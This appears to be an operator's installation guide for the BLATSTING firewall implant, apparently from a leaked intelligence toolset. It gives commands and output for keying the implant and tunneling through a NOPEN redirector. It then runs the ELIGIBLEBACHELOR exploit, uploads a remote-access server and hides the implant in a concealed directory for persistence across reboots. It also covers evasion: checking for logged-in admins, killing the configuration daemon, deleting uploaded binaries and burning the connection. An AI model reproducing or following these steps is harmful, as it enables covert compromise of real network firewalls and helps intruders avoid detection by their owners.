# # These instructions guide the INSTALLATION of BLATSTING using # ELIGIBLEBACHELOR via NOPEN tunnel. # # Before starting this procedure, you should have the following files in the # following locations: # # /current/up/morerats/noserver-linux symbolic link to RedHat 5.0 noserver # # /current/bin/noclient noclient for Linux # # /current/bin/FW/BLATSTING_20222 BLATSTING package directory # # /current/bin/FW/ELBA ELIGIBLEBACHELOR package directory # # These notes were prepared using NOPEN # # Before proceeding you MUST know the version of the firewall software. This # is a required parameter to ELIGIBLEBACHELOR. # # # 0. If this is the first time you are installing this implant, you'll need to # key the implant for deployment. This procedure can be during set-up or at # the time of the operation. It need not be performed on the operations # box. # # Perform the following steps: # - generate a new key: $ cd /current/bin/FW/BLATSTING_20222 $ utils/generate_new_key.sh --help Usage: utils/generate_new_key.sh > Pertinent environment variables: RANDOMDEV: random device (default: /dev/random) $ utils/generate_new_key.sh > config/key_for_target If this script hangs, please type on the keyboard to generate more random data for /dev/random. $ # # Install the new key in the implant: # $ ./utils/rekeybp -h usage: ./utils/rekeybp [ options ] options: -p old_password (if not the default) -P new_password (use - for default) -k old_key_file -K new_key_file -i installer_file (default: runme -h displays this message $ cp target/runme runme.keyed $ ./utils/rekeybp -k config/key.unkeyed -K config/key_for_target -i runme.keyed # # If this step fails, do not install. Consult a BLATSTING developer. # # You will need to save the generated key file, as it contains the # cryptographic keys you'll need to contact the implant. When a key file is # referenced below, this is the key file you will use. # # # Installation via a NOPEN redirector requires a tunnel from the local NOPEN # client to the NOPEN server where local port 5000 is tunneled from the local # NOPEN client to the NOPEN server source port 4050 to the firewall ip $ "firewall_ip" port 4000. # NO> -tunnel l 5000 firewall_ip 4000 4050 # # 1. Run ELIGIBLEBACHELOR. Success should return a NOPEN prompt. # $ cd /current/bin $ ./ELBA.sh usage: ./ELBA.sh version [ options ] Currently supported versions: v3.2.100.010 v3.3.001.050 v3.3.002.021 v3.3.002.030 vTEST ./ELBA Called as: + ./ELBA + Usage: ./ELBA -t -a
[] Options: -t -l -p -r -a
-y -d clear the dmesg -g -s clear the tty1 -P -q quiet mode (do not send "un""ame -a """""") -R random buffer -h print this message -v ====== NOPEN Options ======= -N use NOPEN redirector -c Default: NHOME=/current /current/bin/noclient -i 3 -S Default: PATH=/tos/bin I=x tos_proxyd -f Default: /tos/bin/tos_proxyd -n Default: /current/up/morerats/noserver Ignore the "-a" option. This script inserts the address. # # Now execute ELIGIBLEBACHELOR using the defaults for NOPEN (as listed above). # Provide any parameters where the default is not appropriate. Launch the # script ELBA.sh specifying the correct firewall version, connect to # the local host ( port 5000 which uses source port 4050 via NOPEN # redirection. # $ ./ELBA.sh -t -N -p 5000 -r 4050 -l 4050 # # Executing the above prints lots of output..... # ./ELBA Called as: + ./ELBA -a 0x083f4780 -t -N -p 5000 -r 4050 -l 4050 + Destination IP: Remote port: 5000. Local port: 4050. Address: 83f4780. Rd port: 4050. Connection established. Sending hello packet. Sent hello packet. Sending the real exploit ................................................................................ ......................... Sending nopen server ............................................................................... ............................................................................... ............................................................................... ............................................................................... ............................................................................... ............................................................................... .... Successfully sent the nopen server to the target. Starting the nopen client locally with the command "NHOME=/current /current/bin/noclient -i 3". NOPEN! v3.0.3.4 sh: scanner: command not found sh: ourtn: command not found sh: scripme: command not found Tue Oct 14 18:59:51 GMT 2008 NHOME=/current Reading resource file "/current/etc/norc"... ok TERM=xterm Initiating RSA key exchange Generating random number... ok Initializing RC6... ok Sending random number... ok Receiving random number... ok Generating session key... 0x8CC339A19E82438E3CFA520665F2D6D9 Sending first verify string... ok Receiving second verify string... ok Checking second verify string... ok RSA key exchange complete # # Lots more output... # DO NOT allow NOPEN to run the automatic system discovery (option A for abort). # autodone v. About to run "autodone" commands. This could take a while to run. Choices: N) NOPEN will not callback--your only window will be busy for a while. C) Have NOPEN callback to give you another window, then proceed with autodone. A) Abort autodone for this window/session. D) Abort autodone PERMANENTLY for this host in this and any other NOPEN window. NOTE: Only choose "D" if you know this host has already been done (perhaps under a different IP?), or you DO NOT WANT it done, AND DO NOT want it done later. AND, you'd better have a REALLY good reason... Choose from above: [N] A 2008-10-14 18:59:57 GMT autodone[27042]: ABORTING autodone # # More output... # We will be reading from 11 NO! (none):/>Controlling terminal closed, going back to 0 NO! (none):/> # # If ELIGIBLEBACHELOR fails to create the NOPEN connection see the # troubleshooting section below. # # If ELIGIBLEBACHELOR succeeds immediatly run "ps" on the firewall via nopen # and check for any admin logged on to the system. This is done by looking at # the output to see any commands like "-shell -c 3 #" which indicates an admin # is logged on. If you see no admins then immediatly run "killall tos_configd" # on the firewall via nopen to reset the configuration daemon. It is in an # unstable state and the system will restart it after it dies. If an admin is # logged on and you run this killall command you will kill your connection too. # NO! (none):/> killall tos_configd # # Since the NOPEN server is already running it is safe to remove the binary # that was uploaded to /data/tos_proxyd. # NO! (none):/>-rm /tos/bin/tos_proxyd ############################################################################## # # BLATSTING installation # ############################################################################## # # 1. Verify that the target system is as expected: # Run; NO! (none):/> uname -r # # 2. Upload the installer to the target system. One file is uploaded # and executed from a directory you will make. You must use the directory # specified. DON'T FORGET the "-" in front of the cd and put commands! # NOTE: Do not access the /data/.tos_cores directory in any way since it # is hidden and doing so will eliminate the persistence! # NO! (none):/> mkdir /data/.tos_cores NO! (none):/> -cd /tmp NO! (none):/> -put ../bp/runme.keyed runme.keyed # # 3. Execute the installer which will also launch the implant. Verify the exit # code. The echo MUST appear on the same line as the program executed in order # to get the correct error code from the program. # NO! (none):/> ./runme.keyed; echo $? 0 NO! (none):/> # # 4. If the installation succeeded, verify that you can contact the implant # using the listening post. Set up a UDP redirector via your pitch. The # following example is for NOPEN from your LP to your pitch: # NO! bnf-fw02:/root/NOPEN>-tunnel [10-17-08 16:24:05 GMT][localhost:33794 -> bnf-fw02.] [-tunnel] u 2212 [u 2212] Connecting UDP on channel 1 NOTICE: Connection Attempt success channel 1 # # On the local box in a separate window, run the BLATSTING listening post: # $ cd /current/bin/FW/BLATSTING_20222 $ LP/lp --help ./LP/lpexe Called as: + ./LP/lpexe --help + lp Version: (Built: Sep 4 2008 06:16:55) ./LP/lpexe: unrecognized option `--help' Usage: ./LP/lpexe Options: --lp Listening Post IP Address --implant Implant IP Address --idkey Implant ID Key File --sport Specify Port to Send Packets From --dport Specify Port to Send Packets To [--logfile] File to Log to [--timeout] Listening Post Timeout Threshold (Optional) [--scriptable] Run ./LP/lpexe in scriptable mode (no readline). [--nomenu] Turn menu off. [--quit-after-first-error] $ LP/lp --lp --implant --idkey config/key_for_target --sport 2242 --dport 2212 # # Connect to the implant using option '1', and verify that the connection # succeeds. Query the list of running modules (5 0 0). # 10:17:37 2008-10-16 Menu Selection> 5 0 0 10:17:39 2008-10-16 ===> selection 5 0 0 Modules: Module ID Module type Status Persistence State Owned by installer 0 0 3 core running persistent* no state n 5 0 3 install running persistent* has state n 2 0 1 file running persistent* has state n 12 1 1 bpf running persistent* no state n 3 0 2 network running persistent* no state n 1 1 1 crypto running persistent* no state n 8 1 1 hash running persistent* no state n 7 0 1 cnc running persistent* no state n 10:17:39 2008-10-16 Menu Selection> # # The modules are in a persistent state, as the above list indicates. They # will restart after a reboot. # # You have now successfully installed the BLATSTING implant. # # If you did not run the "killall tos_configd" above due to an admin being # logged in do it now. This will disconnect any one logged on to the system. # Be aware that this may also close your NOPEN connection. NO! (none):/> killall tos_configd # # If you are still connected to the NOPEN server on the firewall you can # burn the connection now. # NO! (none):/tmp>-burnBURN